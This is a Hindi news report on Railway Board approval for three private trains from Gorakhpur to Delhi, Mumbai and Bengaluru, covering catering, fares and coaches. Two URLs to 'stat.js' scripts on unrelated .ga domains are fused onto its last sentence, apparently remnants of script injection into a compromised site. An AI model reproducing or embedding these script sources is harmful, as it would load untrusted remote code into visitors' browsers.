गोरखपुर पूर्वोत्तर रेलवे के मुख्यालय से तीन प्राइवेट ट्रेनों को चलाने को लेकर अफसरों ने मुहर लगा दीया है। चलने वाली तीनों प्राइवेट ट्रेन गोरखपुर से दिल्ली, मुंबई और बेंगलुरु के बीच चलेंगी और इनका रूट भी तय हो चुका है। निजी कंपनियों से टेंडर की प्रक्रिया पूरी हो जाने के बाद ट्रेनों को चलाने के लिए समय का निर्धारित भी कर दिया जाएगा। ट्रेनों के चलाने की जिम्मेदारी रेलवे के पास ही होगी और टिकटों की बुकिंग सहित शेष जिम्मेदारियां कंपनी के कर्मचारियों के पास रहेंगी।

 

रेलवे बोर्ड दिल्ली में हुई बैठक में बोर्ड के अलावा पूर्वोत्तर रेलवे के अधिकारी भी मौजूद थे। बैठक में कभी सोच विचार करने के बाद अधिकारियों के बीच प्राइवेट ट्रेनों के चलाने को लेकर सहमति बनी। ट्रेनों के संचालन में दी जाने वाली रियायते, रखरखाव, साफ-सफाई और खानपान की सुविधा पर भी लंबा चर्चा हुई थी।

 

 

बैठक में यह निर्णय लिया गया कि लखनऊ जंक्शन से नई दिल्ली के बीच चलने वाली तेजस ट्रेन की तरह इस ट्रेन में भी रेल कर्मचारियों और यात्रियों को किसी भी तरह की कोई रियायत नहीं दी जाएगी। राजधानी और शताब्दी की तरह सुबह शाम नाश्ता तथा दोपहर और रात के समय यात्रियों को खाना उपलब्ध कराया जाएगा।

 

 

ट्रेन के किराए को लेकर अभी कुछ स्पष्ट नहीं हुआ है लेकिन संभावना जताई जा रही है कि हमसफर एक्सप्रेस की तरह ही टिकटों की बुकिंग होगी। सीट कम होने के साथ किराया बढ़ता जाएगा। ट्रेनों में अत्याधुनिक लिंक हाफमैन बूस कोच लगाए जाएंगे।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.